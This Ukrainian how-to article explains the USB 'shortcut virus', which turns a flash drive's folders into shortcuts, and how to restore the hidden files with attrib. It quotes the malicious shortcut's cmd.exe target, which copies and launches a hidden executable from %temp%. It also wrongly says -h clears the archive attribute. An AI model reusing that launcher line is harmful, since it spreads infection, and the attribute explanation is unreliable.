Статьи

Все папки і файли на флешці стали ярликами

  1. Відновлення колишнього вигляду папок

Мабуть, самий явний вид зараження, це коли всі файли і папки на флешці раптом перетворилися в ярлики

Мабуть, самий явний вид зараження, це коли всі файли і папки на флешці раптом перетворилися в ярлики. Хоч його і видно неозброєним поглядом без всяких антивірусів, в результаті неграмотних дій користувача, наслідки можуть бути сумними.

Якщо на флешці були дуже важливі файли, важко втриматися від спокуси упевнитися що ними все в порядку, ткнути мишкою в знайомі до болю назви ... а ось цього робити зовсім не варто!

І документи ваші швидше за все благополучно відкриються, і щастя прийде ... ось тільки комп'ютер буде заражений. Насправді, кожен ярлик містить певні команди на запуск і установку вірусу, а вже потім відкриття вашої дорогоцінної папки.

Можна подивитися властивості ярлика, де в рядку «Об'єкт» міститься інформація, що ж все-таки ми будемо запускати насправді.

Можна подивитися властивості ярлика, де в рядку «Об'єкт» міститься інформація, що ж все-таки ми будемо запускати насправді

% ALLUSERSPROFILE% \ .. \ .. \ windows \ system32 \ cmd.exe / c "% SystemRoot% \ explorer.exe% cd3G8A5K.000 & attrib -s -h% cd% SkInrsg.exe & xcopy / F / S / Q / H / R / Y% cd% SkInrsg.exe% temp% \ lFbYd \ & attrib + s + h% cd% SkInrsg.exe & start% temp% \ lFbYd \ SkInrsg.exe & exit "

Якщо ви нічого не зрозуміли з цієї тарабарщини, краще довірити лікування антивірусу (можна скористатися тим же Dr.Web CureIt! ). Якщо розумієте що робите, можна видалити вірус і вручну. Займемося іншим, а саме відновленням інформації на флешці.

Відновлення колишнього вигляду папок

  1. Ярлики, які зараз є на флешці замість файлів і папок, можна сміливо видаляти.
  2. Вірус позначив всі файли і папки на флешці системними і прихованими. Скидаємо ці атрибути через командний рядок (Пуск -> Виконати -> вводимо cmd):

cd / d E: \ натиснути ENTER (E: \ - це буква нашої флешки) attrib -s -h / d / s натиснути ENTER

Команда attrib змінює атрибути файлів. Параметри -s і -h знімають атрибути системний і архівний відповідно, а ключі / s / d застосовують цю дію до файлів і папок.

Підписуйтесь на канал Яндекс.Дзен і дізнавайтеся першими про нові матеріали, опублікованих на сайті.

Новости

Как оформить диск малыш от рождения до года из фото и видео
Оформить диск "Малыш от рождения до года" из фото и видео можно совершенно разными способами! Кто-то для достижения данной цели идет на шоу-таланты, кто-то пользуется услугами профессионалов, а кто-то

Как оформить группу в вконтакте видео
Дано хотел свой магазин в вк, но не знал с чего начать его делать. Так как хотелось не банальный магазин с кучей ссылок и фото, а красиво оформленный. С меню, с аватаркой. После просмотра видео создал

Как создать фото из видео
Кризис заставляет искать дополнительные источники дохода. Одним из таких источников может стать торговля на валютном рынке Форекс. Но чтобы не потерять свои деньги необходимо работать с надежным брокером.